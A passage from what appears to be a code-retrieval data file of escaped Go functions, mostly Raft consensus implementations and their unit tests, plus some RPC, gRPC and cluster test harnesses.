sc.Publish(channel, expectedMsg[1].data); err != nil {\n\t\tt.Fatalf(\"Error on publish: %v\", err)\n\t}\n\tsc.Close()\n\t// Wait for channel to be replicated in all servers\n\tverifyChannelConsistency(t, channel, 5*time.Second, 1, 1, expectedMsg, servers...)\n\n\t// Kill a follower.\n\tvar follower *StanServer\n\tfor _, s := range servers {\n\t\tif leader != s {\n\t\t\tfollower = s\n\t\t\tbreak\n\t\t}\n\t}\n\tservers = removeServer(servers, follower)\n\tfollower.Shutdown()\n\n\t// Wait for more than the MaxInactivity\n\ttime.Sleep(2 * maxInactivity)\n\t// Check channel is no longer in leader\n\tverifyChannelExist(t, leader, channel, false, 5*time.Second)\n\t// Perform a snapshot after the channel has been deleted\n\tif err := leader.raft.Snapshot().Error(); err != nil {\n\t\tt.Fatalf(\"Error on snapshot: %v\", err)\n\t}\n\n\t// Restart the follower\n\tfollower = runServerWithOpts(t, follower.opts, nil)\n\tdefer follower.Shutdown()\n\tservers = append(servers, follower)\n\n\tgetLeader(t, 10*time.Second, servers...)\n\n\t// The follower will have recovered foo (from streaming store), but then from\n\t// the snapshot should realize that the channel no longer exits and should delete it.\n\tverifyChannelExist(t, follower, channel, false, 5*time.Second)\n}", "func (r *RaftNode) doFollower() stateFunction {\n\n\tr.initFollowerState()\n\n\t// election timer for handling going into candidate state\n\telectionTimer := r.randomTimeout(r.config.ElectionTimeout)\n\n\tfor {\n\t\tselect {\n\t\tcase shutdown := <-r.gracefulExit:\n\t\t\tif shutdown {\n\t\t\t\tr.Out(\"Shutting down\")\n\t\t\t\treturn nil\n\t\t\t}\n\n\t\tcase <-electionTimer:\n\t\t\t// if we timeout with no appendEntries heartbeats,\n\t\t\t// start election with this node\n\t\t\tr.Out(\"Election timeout\")\n\n\t\t\t// for debugging purposes:\n\t\t\tif r.debugCond != nil {\n\t\t\t\tr.debugCond.L.Lock()\n\t\t\t\tr.Out(\"Waiting for broadcast...\")\n\t\t\t\tr.debugCond.Wait()\n\t\t\t\tr.debugCond.L.Unlock()\n\t\t\t}\n\n\t\t\treturn r.doCandidate\n\n\t\tcase msg := <-r.requestVote:\n\t\t\tif votedFor, _ := r.handleRequestVote(msg); votedFor {\n\t\t\t\t// reset timeout if voted so not all (non-candidate-worthy) nodes become candidates at once\n\t\t\t\tr.Debug(\"Election timeout reset\")\n\t\t\t\telectionTimer = r.randomTimeout(r.config.ElectionTimeout)\n\t\t\t}\n\t\tcase msg := <-r.appendEntries:\n\t\t\tif resetTimeout, _ := r.handleAppendEntries(msg); resetTimeout {\n\t\t\t\telectionTimer = r.randomTimeout(r.config.ElectionTimeout)\n\t\t\t}\n\t\tcase msg := <-r.registerClient:\n\t\t\tr.Out(\"RegisterClient received\")\n\t\t\tr.handleRegisterClientAsNonLeader(msg)\n\n\t\tcase msg := <-r.clientRequest:\n\t\t\tr.handleClientRequestAsNonLeader(msg)\n\t\t}\n\t}\n}", "func (r *Raft) follower(timeout int) int {\n\t//myId := r.Myconfig.Id\n\t//fmt.Println(\"In follower()\", myId)\n\t//start heartbeat timer,timeout func wil place HeartbeatTimeout on channel\n\twaitTime := timeout //use random number after func is tested--PENDING\n\tHeartBeatTimer := r.StartTimer(HeartbeatTimeout, waitTime)\n\n\tfor {\n\t\treq := r.receive()\n\t\tswitch req.(type) {\n\t\tcase AppendEntriesReq:\n\t\t\trequest := req.(AppendEntriesReq) //explicit typecasting\n\t\t\tr.serviceAppendEntriesReq(request, HeartBeatTimer, waitTime)\n\t\tcase RequestVote:\n\t\t\twaitTime_secs := secs * time.Duration(waitTime)\n\t\t\trequest := req.(RequestVote)\n\t\t\t//fmt.Println(\"Requestvote came to\", myId, \"from\", request.candidateId)\n\t\t\tHeartBeatTimer.Reset(waitTime_secs)\n\t\t\t//fmt.Println(\"Timer reset to:\", waitTime_secs)\n\t\t\tr.serviceRequestVote(request)\n\t\tcase ClientAppendReq: //follower can't handle clients and redirects to leader, sends upto commitCh as well as clientCh\n\t\t\t//fmt.Println(\"in client append\")\n\t\t\trequest := req.(ClientAppendReq) //explicit typecasting\n\t\t\tresponse := ClientAppendResponse{}\n\t\t\tlogItem := LogItem{r.CurrentLogEntryCnt, false, request.data} //lsn is count started from 0\n\t\t\tr.CurrentLogEntryCnt += 1\n\t\t\tresponse.logEntry = logItem\n\t\t\tr.commitCh <- &response.logEntry\n\t\t\t//var e error = ErrRedirect(r.LeaderConfig.Id)\n\t\t\t//response.ret_error = e\n\t\t\t//r.clientCh <- response //respond to client giving the leader Id--Should only be given leader id right?--CHECK\n\t\tcase int:\n\t\t\t//fmt.Println(\"In follower timeout\", r.Myconfig.Id, time.Now().Format(layout))\n\t\t\tHeartBeatTimer.Stop() //turn off timer as now election timer will start in candidate() mode\n\t\t\treturn candidate\n\t\t}\n\t}\n}", "func StartTestManager(mgr manager.Manager) chan struct{} {\n\tstop := make(chan struct{})\n\tgo func() {\n\t\tΩ.Expect(mgr.Start(stop)).NotTo(Ω.HaveOccurred())\n\t}()\n\treturn stop\n}", "func waitForStart(server *Server) {\n\treader := bufio.NewReader(os.Stdin)\n\ttext, _ := reader.ReadString('\\n')\n\tfmt.Println(\"IS start exec :: \", text)\n\tserver.executor.summary.startTime = time.Now().UnixNano()\n\tif text == \"start\\n\" {\n\t\tcmd := pb.ExecutionCommand{\n\t\t\tType: startExec,\n\t\t}\n\t\tfor clinetID := range server.clientStreams {\n\t\t\tserver.sendCommand(clinetID, &cmd)\n\t\t}\n\t}\n}", "func TestFollowerCommitEntry(t *testing.T) {\n\ttests := []struct {\n\t\tents []pb.Entry\n\t\tcommit uint64\n\t}{\n\t\t{\n\t\t\t[]pb.Entry{\n\t\t\t\t{Term: 1, Index: 1, Data: []byte(\"some data\")},\n\t\t\t},\n\t\t\t1,\n\t\t},\n\t\t{\n\t\t\t[]pb.Entry{\n\t\t\t\t{Term: 1, Index: 1, Data: []byte(\"some data\")},\n\t\t\t\t{Term: 1, Index: 2, Data: []byte(\"some data2\")},\n\t\t\t},\n\t\t\t2,\n\t\t},\n\t\t{\n\t\t\t[]pb.Entry{\n\t\t\t\t{Term: 1, Index: 1, Data: []byte(\"some data2\")},\n\t\t\t\t{Term: 1, Index: 2, Data: []byte(\"some data\")},\n\t\t\t},\n\t\t\t2,\n\t\t},\n\t\t{\n\t\t\t[]pb.Entry{\n\t\t\t\t{Term: 1, Index: 1, Data: []byte(\"some data\")},\n\t\t\t\t{Term: 1, Index: 2, Data: []byte(\"some data2\")},\n\t\t\t},\n\t\t\t1,\n\t\t},\n\t}\n\tfor i, tt := range tests {\n\t\tr := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\t\tdefer closeAndFreeRaft(r)\n\t\tr.becomeFollower(1, 2)\n\n\t\tr.Step(pb.Message{From: 2, To: 1, Type: pb.MsgApp, Term: 1, Entries: tt.ents, Commit: tt.commit})\n\n\t\tif g := r.raftLog.committed; g != tt.commit {\n\t\t\tt.Errorf(\"#%d: committed = %d, want %d\", i, g, tt.commit)\n\t\t}\n\t\twents := tt.ents[:int(tt.commit)]\n\t\tif g := r.raftLog.nextEnts(); !reflect.DeepEqual(g, wents) {\n\t\t\tt.Errorf(\"#%d: nextEnts = %v, want %v\", i, g, wents)\n\t\t}\n\t}\n}", "func TestLearnerPromotion(t *testing.T) {\n\tn1 := newTestLearnerRaft(1, []uint64{1}, []uint64{2}, 10, 1, NewMemoryStorage())\n\tn2 := newTestLearnerRaft(2, []uint64{1}, []uint64{2}, 10, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(n1)\n\tdefer closeAndFreeRaft(n2)\n\n\tn1.becomeFollower(1, None)\n\tn2.becomeFollower(1, None)\n\n\tnt := newNetwork(n1, n2)\n\n\tif n1.state == StateLeader {\n\t\tt.Error(\"peer 1 state is leader, want not\", n1.state)\n\t}\n\n\t// n1 should become leader\n\tsetRandomizedElectionTimeout(n1, n1.electionTimeout)\n\tfor i := 0; i < n1.electionTimeout; i++ {\n\t\tn1.tick()\n\t}\n\n\tif n1.state != StateLeader {\n\t\tt.Errorf(\"peer 1 state: %s, want %s\", n1.state, StateLeader)\n\t}\n\tif n2.state != StateFollower {\n\t\tt.Errorf(\"peer 2 state: %s, want %s\", n2.state, StateFollower)\n\t}\n\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgBeat})\n\tgrp2 := pb.Group{\n\t\tNodeId: 2,\n\t\tGroupId: 1,\n\t\tRaftReplicaId: 2,\n\t}\n\tn1.addNode(2, grp2)\n\tn2.addNode(2, grp2)\n\tif n2.isLearner {\n\t\tt.Error(\"peer 2 is learner, want not\")\n\t}\n\n\t// n2 start election, should become leader\n\tsetRandomizedElectionTimeout(n2, n2.electionTimeout)\n\tfor i := 0; i < n2.electionTimeout; i++ {\n\t\tn2.tick()\n\t}\n\n\tnt.send(pb.Message{From: 2, To: 2, Type: pb.MsgBeat})\n\n\tif n1.state != StateFollower {\n\t\tt.Errorf(\"peer 1 state: %s, want %s\", n1.state, StateFollower)\n\t}\n\tif n2.state != StateLeader {\n\t\tt.Errorf(\"peer 2 state: %s, want %s\", n2.state, StateLeader)\n\t}\n}", "func TestMain(m *testing.M) {\n\ttestServer = rpc.NewServer()\n\n\tts, e := rpcServer.NewTrackService(types.User{}, fakeTracker)\n\tif e != nil {\n\t\tlog.Fatal(\"NewTrackService error:\", e)\n\t}\n\ttestServer.RegisterName(\"TrackService\", ts)\n\n\tus, e := rpcServer.NewUserService(types.User{}, fakeUserer)\n\tif e != nil {\n\t\tlog.Fatal(\"NewUserService error:\", e)\n\t}\n\ttestServer.RegisterName(\"UserService\", us)\n\n\tlis, e = net.Listen(\"tcp\", \":0\")\n\tif e != nil {\n\t\tlog.Fatal(\"listen error:\", e)\n\t}\n\tlog.Println(\"listening on\", lis.Addr())\n\tgo http.Serve(lis, testServer)\n\n\t// dial client to it and create test client\n\trpcc, e := rpc.DialHTTP(\"tcp\", lis.Addr().String())\n\tif e != nil {\n\t\tlog.Fatal(\"rpc.DialHTTP:\", e)\n\t}\n\n\ttcClient, e := rpcClient.NewTracksClient(rpcc)\n\tif e != nil {\n\t\tlog.Fatal(\"rpcClient.NewTracksClient:\", e)\n\t}\n\n\ttuClient, e := rpcClient.NewUsersClient(rpcc)\n\tif e != nil {\n\t\tlog.Fatal(\"rpcClient.NewUsersClient:\", e)\n\t}\n\n\ttestClient = rpcClient.New(tcClient, tuClient)\n\n\tret := m.Run()\n\n\tif e := lis.Close(); e != nil {\n\t\tlog.Fatal(e)\n\t}\n\ttestServer = nil\n\n\tos.Exit(ret)\n}", "func (s *TrackerSuite) TestStartNil() {\n\n\tassert.Equal(s.T(), ErrorNil, s.service.Start(nil))\n}", "func (sm *State_Machine) FollTesting(t *testing.T) {\n\n\t//Creating a follower which has just joined the cluster.\n\tvar follTC TestCases\n\tfollTC.t = t\n\tvar cmdReq = []string{\"read test\", \"read cs733\"}\n\n\t//<<<|Id:1000|Status:follower|CurrTerm:2|LoggIng:1|votedFor:0|commitInd:0|>>>\n\n\t/*Sending an apped request*/\n\tfollTC.req = Append{Data: []byte(cmdReq[0])}\n\tfollTC.respExp = Commit{Data: []byte(\"5000\"), Err: []byte(\"I'm not leader\")}\n\tsm.ClientCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\n\t/*Sending appendEntry request*/\n\t//Suppose leader and follower are at same Term.\n\tentries1 := Logg{Logg: []MyLogg{{1, \"read test\"}}}\n\tfollTC.req = AppEntrReq{Term: 1, LeaderId: 5000, PreLoggInd: 0, PreLoggTerm: 2, Logg: entries1, LeaderCom: 0}\n\tfollTC.respExp = Send{PeerId: 5000, Event: AppEntrResp{Term: 1, Succ: true}}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\tfollTC.resp = <-sm.ActionCh //expecting alarm signal\n\tfollTC.respExp = Alarm{T: 0}\n\tfollTC.expect()\n\tfollTC.resp = <-sm.ActionCh //expecting LogStore\n\tfollTC.respExp = Alarm{T: 0}\n\tfollTC.expect()\n\n\t//<<<|Id:1000|Status:follower|CurrTerm:1|LoggInd:1|votedFor:0|commitInd:0|lastApp:0|>>>\n\n\t//Sending Multiple entries\n\tentries2 := Logg{Logg: []MyLogg{{1, \"read test\"}, {1, \"read cloud\"}, {1, \"read cs733\"}}}\n\tfollTC.req = AppEntrReq{Term: 1, LeaderId: 5000, PreLoggInd: 0, PreLoggTerm: 1, Logg: entries2, LeaderCom: 1}\n\tfollTC.respExp = Send{PeerId: 5000, Event: AppEntrResp{Term: 1, Succ: true}}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\tfollTC.resp = <-sm.ActionCh //expecting alarm signal\n\tfollTC.respExp = Alarm{T: 200}\n\tfollTC.expect()\n\n\t//<<<|Id:1000|Status:follower|CurrTerm:1|LoggInd:3|votedFor:0|commitInd:1|lastApp:0|>>>\n\n\t//Suppose leader has higher Term than follower.\n\tentries3 := Logg{Logg: []MyLogg{{1, \"read cs733\"}, {2, \"delete test\"}}}\n\tfollTC.req = AppEntrReq{Term: 2, LeaderId: 5000, PreLoggInd: 2, PreLoggTerm: 1, Logg: entries3, LeaderCom: 2}\n\tfollTC.respExp = Send{PeerId: 5000, Event: AppEntrResp{Term: 2, Succ: true}}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\tfollTC.resp = <-sm.ActionCh //expecting alarm signal\n\tfollTC.respExp = Alarm{T: 200}\n\tfollTC.expect()\n\n\t//<<<|Id:1000|Status:follower|CurrTerm:2|LoggIng:4|votedFor:0|commitInd:2|lastApp:0|>>>\n\n\t//Suppose follower has higher Term than leader.\n\tentries4 := Logg{Logg: []MyLogg{{1, \"read cs733\"}, {2, \"delete test\"}}}\n\tfollTC.req = AppEntrReq{Term: 1, LeaderId: 5000, PreLoggInd: 2, PreLoggTerm: 2, Logg: entries4, LeaderCom: 2}\n\tfollTC.respExp = Send{PeerId: 5000, Event: AppEntrResp{Term: 2, Succ: false}}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\tfollTC.resp = <-sm.ActionCh //expecting alarm signal\n\tfollTC.respExp = Alarm{T: 200}\n\tfollTC.expect()\n\n\t//Suppose prevIndex does not matches.\n\tentries4 = Logg{Logg: []MyLogg{{3, \"append test\"}, {3, \"cas test\"}}}\n\tfollTC.req = AppEntrReq{Term: 3, LeaderId: 5000, PreLoggInd: 5, PreLoggTerm: 3, Logg: entries4, LeaderCom: 2}\n\tfollTC.respExp = Send{PeerId: 5000, Event: AppEntrResp{Term: 2, Succ: false}}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\tfollTC.resp = <-sm.ActionCh //expecting alarm signal\n\tfollTC.respExp = Alarm{T: 200}\n\tfollTC.expect()\n\n\t//Suppose prevIndex matches, but entry doesnt.\n\tentries4 = Logg{Logg: []MyLogg{{3, \"append test\"}, {3, \"cas test\"}}}\n\tfollTC.req = AppEntrReq{Term: 3, LeaderId: 5000, PreLoggInd: 3, PreLoggTerm: 3, Logg: entries4, LeaderCom: 2}\n\tfollTC.respExp = Send{PeerId: 5000, Event: AppEntrResp{Term: 2, Succ: false}}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\tfollTC.resp = <-sm.ActionCh //expecting alarm signal\n\tfollTC.respExp = Alarm{T: 200}\n\tfollTC.expect()\n\n\t//Everything is ok, but no entry.\n\tfollTC.req = AppEntrReq{Term: 3, LeaderId: 5000, PreLoggInd: 3, PreLoggTerm: 3, LeaderCom: 2}\n\tfollTC.respExp = Alarm{T: 200}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\n\t/*Sending vote request*/\n\t//sending vote request with lower Term.\n\tfollTC.req = VoteReq{Term: 1, CandId: 2000, PreLoggInd: 1, PreLoggTerm: 1}\n\tfollTC.respExp = Send{PeerId: 2000, Event: VoteResp{Term: 2, VoteGrant: false}}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\n\t//sending vote request with not updated Logg.\n\tfollTC.req = VoteReq{Term: 3, CandId: 2000, PreLoggInd: 1, PreLoggTerm: 1}\n\tfollTC.respExp = Send{PeerId: 2000, Event: VoteResp{Term: 2, VoteGrant: false}}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\n\t//sending vote request with not updated Logg.\n\tfollTC.req = VoteReq{Term: 3, CandId: 2000, PreLoggInd: 5, PreLoggTerm: 4}\n\tfollTC.respExp = Send{PeerId: 2000, Event: VoteResp{Term: 3, VoteGrant: true}}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\n\t//<<<|Id:1000|Status:follower|CurrTerm:3|LoggIng:4|votedFor:1|commitInd:2|lastApp:0|>>>\n\n\t//checking against duplicate vote rquest\n\tfollTC.req = VoteReq{Term: 3, CandId: 2000, PreLoggInd: 5, PreLoggTerm: 4}\n\tfollTC.respExp = Send{PeerId: 2000, Event: VoteResp{Term: 3, VoteGrant: false}}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\n\t/*Sending timeout*/\n\tfollTC.req = Timeout{}\n\tfollTC.respExp = Alarm{T: 150}\n\tsm.TimeoutCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh //expecting alarm signal\n\tfollTC.expect()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.respExp = Send{PeerId: 0, Event: VoteReq{Term: 4, CandId: 1000, PreLoggInd: 3, PreLoggTerm: 2}} //also the vote request\n\tfollTC.expect()\n\n}", "func (tt *Tester) Catchup() {\n\ttt.waitStartup()\n\ttt.waitForClients()\n}", "func (r *Raft) becomeFollower(term uint64, lead uint64) {\n\t// Your Code Here (2A).\n\tr.State = StateFollower\n\tr.Lead = lead\n\tr.Term = term\n\tr.Vote = None\n}", "func TestLeaderStartReplication(t *testing.T) {\n\ts := NewMemoryStorage()\n\tr := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, s)\n\tdefer closeAndFreeRaft(r)\n\tr.becomeCandidate()\n\tr.becomeLeader()\n\tcommitNoopEntry(r, s)\n\tli := r.raftLog.lastIndex()\n\n\tents := []pb.Entry{{Data: []byte(\"some data\")}}\n\tr.Step(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: ents})\n\n\tif g := r.raftLog.lastIndex(); g != li+1 {\n\t\tt.Errorf(\"lastIndex = %d, want %d\", g, li+1)\n\t}\n\tif g := r.raftLog.committed; g != li {\n\t\tt.Errorf(\"committed = %d, want %d\", g, li)\n\t}\n\tmsgs := r.readMessages()\n\tsort.Sort(messageSlice(msgs))\n\twents := []pb.Entry{{Index: li + 1, Term: 1, Data: []byte(\"some data\")}}\n\twmsgs := []pb.Message{\n\t\t{From: 1, FromGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\tTo: 2, ToGroup: pb.Group{NodeId: 2, GroupId: 1, RaftReplicaId: 2}, Term: 1, Type: pb.MsgApp, Index: li, LogTerm: 1, Entries: wents, Commit: li},\n\t\t{From: 1, FromGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\tTo: 3, ToGroup: pb.Group{NodeId: 3, GroupId: 1, RaftReplicaId: 3}, Term: 1, Type: pb.MsgApp, Index: li, LogTerm: 1, Entries: wents, Commit: li},\n\t}\n\tif !reflect.DeepEqual(msgs, wmsgs) {\n\t\tt.Errorf(\"msgs = %+v, want %+v\", msgs, wmsgs)\n\t}\n\tif g := r.raftLog.unstableEntries(); !reflect.DeepEqual(g, wents) {\n\t\tt.Errorf(\"ents = %+v, want %+v\", g, wents)\n\t}\n}", "func makeTestDaemonWithMinerAndStart(t *testing.T) *th.TestDaemon {\n\tdaemon := th.NewDaemon(\n\t\tt,\n\t\tth.WithMiner(fixtures.TestMiners[0]),\n\t\tth.KeyFile(fixtures.KeyFilePaths()[0]),\n\t).Start()\n\treturn daemon\n}", "func TestRaftAddOneNode(t *testing.T) {\n\tID1 := \"1\"\n\tID2 := \"2\"\n\tclusterPrefix := \"TestRaftAddOneNode\"\n\n\t// Create n1 node.\n\tfsm1 := newTestFSM(ID1)\n\tn1 := testCreateRaftNode(getTestConfig(ID1, clusterPrefix+ID1), newStorage())\n\n\t// Create n2 node.\n\tfsm2 := newTestFSM(ID2)\n\tn2 := testCreateRaftNode(getTestConfig(ID2, clusterPrefix+ID2), newStorage())\n\tconnectAllNodes(n1, n2)\n\n\t// The cluster starts with only one node -- n1.\n\tn1.Start(fsm1)\n\tn1.ProposeInitialMembership([]string{ID1})\n\n\t// Wait it to be elected as leader.\n\t<-fsm1.leaderCh\n\n\t// Propose two commands to the cluster. Now the cluster only contains node n1.\n\tn1.Propose([]byte(\"data1\"))\n\tpending := n1.Propose([]byte(\"data2\"))\n\t<-pending.Done\n\n\t// Add node n2 to the cluster.\n\tpending = n1.AddNode(ID2)\n\n\t// The reconfiguration will be blocked until n2 starts. Because the\n\t// new configuration needs to be committed in new quorum\n\tselect {\n\tcase <-pending.Done:\n\t\t// The node might step down, in that case 'ErrNotLeaderAnymore' will be\n\t\t// returned.\n\t\tif pending.Err == nil {\n\t\t\tt.Fatalf(\"the proposed command should fail as the cluster doesn't have a quorum\")\n\t\t}\n\tcase <-time.After(10 * time.Millisecond):\n\t}\n\n\t// Start n2 as a joiner.\n\tn2.Start(fsm2)\n\n\t// Two FSMs should apply all 2 commands, eventually.\n\tif !testEntriesEqual(fsm1.appliedCh, fsm2.appliedCh, 2) {\n\t\tt.Fatal(\"two FSMs in same group applied different sequence of commands.\")\n\t}\n}", "func TestClientEndpoint_Register_NodeConn_Forwarded(t *testing.T) {\n\tt.Parallel()\n\trequire := require.New(t)\n\ts1 := TestServer(t, func(c *Config) {\n\t\tc.BootstrapExpect = 2\n\t})\n\n\tdefer s1.Shutdown()\n\ts2 := TestServer(t, func(c *Config) {\n\t\tc.DevDisableBootstrap = true\n\t})\n\tdefer s2.Shutdown()\n\tTestJoin(t, s1, s2)\n\ttestutil.WaitForLeader(t, s1.RPC)\n\ttestutil.WaitForLeader(t, s2.RPC)\n\n\t// Determine the non-leader server\n\tvar leader, nonLeader *Server\n\tif s1.IsLeader() {\n\t\tleader = s1\n\t\tnonLeader = s2\n\t} else {\n\t\tleader = s2\n\t\tnonLeader = s1\n\t}\n\n\t// Send the requests to the non-leader\n\tcodec := rpcClient(t, nonLeader)\n\n\t// Check that we have no client connections\n\trequire.Empty(nonLeader.connectedNodes())\n\trequire.Empty(leader.connectedNodes())\n\n\t// Create the register request\n\tnode := mock.Node()\n\treq := &structs.NodeRegisterRequest{\n\t\tNode: node,\n\t\tWriteRequest: structs.WriteRequest{Region: \"global\"},\n\t}\n\n\t// Fetch the response\n\tvar resp structs.GenericResponse\n\tif err := msgpackrpc.CallWithCodec(codec, \"Node.Register\", req, &resp); err != nil {\n\t\tt.Fatalf(\"err: %v\", err)\n\t}\n\tif resp.Index == 0 {\n\t\tt.Fatalf(\"bad index: %d\", resp.Index)\n\t}\n\n\t// Check that we have the client connections on the non leader\n\tnodes := nonLeader.connectedNodes()\n\trequire.Len(nodes, 1)\n\trequire.Contains(nodes, node.ID)\n\n\t// Check that we have no client connections on the leader\n\tnodes = leader.connectedNodes()\n\trequire.Empty(nodes)\n\n\t// Check for the node in the FSM\n\tstate := leader.State()\n\ttestutil.WaitForResult(func() (bool, error) {\n\t\tout, err := state.NodeByID(nil, node.ID)\n\t\tif err != nil {\n\t\t\treturn false, err\n\t\t}\n\t\tif out == nil {\n\t\t\treturn false, fmt.Errorf(\"expected node\")\n\t\t}\n\t\tif out.CreateIndex != resp.Index {\n\t\t\treturn false, fmt.Errorf(\"index mis-match\")\n\t\t}\n\t\tif out.ComputedClass == \"\" {\n\t\t\treturn false, fmt.Errorf(\"ComputedClass not set\")\n\t\t}\n\n\t\treturn true, nil\n\t}, func(err error) {\n\t\tt.Fatalf(\"err: %v\", err)\n\t})\n\n\t// Close the connection and check that we remove the client connections\n\trequire.Nil(codec.Close())\n\ttestutil.WaitForResult(func() (bool, error) {\n\t\tnodes := nonLeader.connectedNodes()\n\t\treturn len(nodes) == 0, nil\n\t}, func(err error) {\n\t\tt.Fatalf(\"should have no clients\")\n\t})\n}", "func StartE2ETesting() {\n\tgo daemon.DoYourThing()\n\tlogrus.Info(\"Started E2E tests\")\n\tlogrus.Info(lbrycrd.ClaimName(\"chainquery\", \"636861696e717565727920697320617765736f6d6521\", 0.01))\n\tlogrus.Info(lbrycrd.GenerateBlocks(1))\n\ttime.Sleep(10 * time.Second)\n\tdaemon.ShutdownDaemon()\n}", "func clientSetup(t *testing.T) (*e2e.ManagementServer, string, uint32, func()) {\n\t// Spin up a xDS management server on a local port.\n\tnodeID := uuid.New().String()\n\tfs, err := e2e.StartManagementServer(e2e.ManagementServerOptions{})\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\t// Create a bootstrap file in a temporary directory.\n\tbootstrapCleanup, err := bootstrap.CreateFile(bootstrap.Options{\n\t\tNodeID: nodeID,\n\t\tServerURI: fs.Address,\n\t\tServerListenerResourceNameTemplate: \"grpc/server\",\n\t})\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\t// Initialize a gRPC server and register the stubServer on it.\n\tserver := grpc.NewServer()\n\ttestgrpc.RegisterTestServiceServer(server, &testService{})\n\n\t// Create a local listener and pass it to Serve().\n\tlis, err := testutils.LocalTCPListener()\n\tif err != nil {\n\t\tt.Fatalf(\"testutils.LocalTCPListener() failed: %v\", err)\n\t}\n\n\tgo func() {\n\t\tif err := server.Serve(lis); err != nil {\n\t\t\tt.Errorf(\"Serve() failed: %v\", err)\n\t\t}\n\t}()\n\n\treturn fs, nodeID, uint32(lis.Addr().(*net.TCPAddr).Port), func() {\n\t\tfs.Stop()\n\t\tbootstrapCleanup()\n\t\tserver.Stop()\n\t}\n}", "func (s *raftServer) lead() {\n\ts.hbTimeout.Reset(time.Duration(s.config.HbTimeoutInMillis) * time.Millisecond)\n\t// launch a goroutine to handle followersFormatInt(\n\tfollower := s.followers()\n\tnextIndex, matchIndex, aeToken := s.initLeader(follower)\n\ts.leaderId.Set(s.server.Pid())\n\n\tgo s.handleFollowers(follower, nextIndex, matchIndex, aeToken)\n\tgo s.updateLeaderCommitIndex(follower, matchIndex)\n\tfor s.State() == LEADER {\n\t\tselect {\n\t\tcase <-s.hbTimeout.C:\n\t\t\t//s.writeToLog(\"Sending hearbeats\")\n\t\t\ts.sendHeartBeat()\n\t\t\ts.hbTimeout.Reset(time.Duration(s.config.HbTimeoutInMillis) * time.Millisecond)\n\t\tcase msg := <-s.outbox:\n\t\t\t// received message from state machine\n\t\t\ts.writeToLog(\"Received message from state machine layer\")\n\t\t\ts.localLog.Append(&raft.LogEntry{Term: s.Term(), Data: msg})\n\t\tcase e := <-s.server.Inbox():\n\t\t\traftMsg := e.Msg\n\t\t\tif ae, ok := raftMsg.(AppendEntry); ok { // AppendEntry\n\t\t\t\ts.handleAppendEntry(e.Pid, &ae)\n\t\t\t} else if rv, ok := raftMsg.(RequestVote); ok { // RequestVote\n\t\t\t\ts.handleRequestVote(e.Pid, &rv)\n\t\t\t} else if entryReply, ok := raftMsg.(EntryReply); ok {\n\t\t\t\tn, found := nextIndex.Get(e.Pid)\n\t\t\t\tvar m int64\n\t\t\t\tif !found {\n\t\t\t\t\tpanic(\"Next index not found for follower \" + strconv.Itoa(e.Pid))\n\t\t\t\t} else {\n\t\t\t\t\tm, found = matchIndex.Get(e.Pid)\n\t\t\t\t\tif !found {\n\t\t\t\t\t\tpanic(\"Match index not found for follower \" + strconv.Itoa(e.Pid))\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t\tif entryReply.Success {\n\t\t\t\t\t// update nextIndex for follower\n\t\t\t\t\tif entryReply.LogIndex != HEARTBEAT {\n\t\t\t\t\t\taeToken.Set(e.Pid, 1)\n\t\t\t\t\t\tnextIndex.Set(e.Pid, max(n+1, entryReply.LogIndex+1))\n\t\t\t\t\t\tmatchIndex.Set(e.Pid, max(m, entryReply.LogIndex))\n\t\t\t\t\t\t//s.writeToLog(\"Received confirmation from \" + strconv.Itoa(e.Pid))\n\t\t\t\t\t}\n\t\t\t\t} else if s.Term() >= entryReply.Term {\n\t\t\t\t\tnextIndex.Set(e.Pid, n-1)\n\t\t\t\t} else {\n\t\t\t\t\ts.setState(FOLLOWER)\n\t\t\t\t\t// There are no other goroutines active\n\t\t\t\t\t// at this point which modify term\n\t\t\t\t\tif s.Term() >= entryReply.Term {\n\t\t\t\t\t\tpanic(\"Follower replied false even when Leader's term is not smaller\")\n\t\t\t\t\t}\n\t\t\t\t\ts.setTerm(entryReply.Term)\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\ts.hbTimeout.Stop()\n}", "func TestLeaderTransferSecondTransferToAnotherNode(t *testing.T) {\n\tnt := newNetwork(nil, nil, nil)\n\tdefer nt.closeAll()\n\tnt.send(pb.Message{From: 1, To: 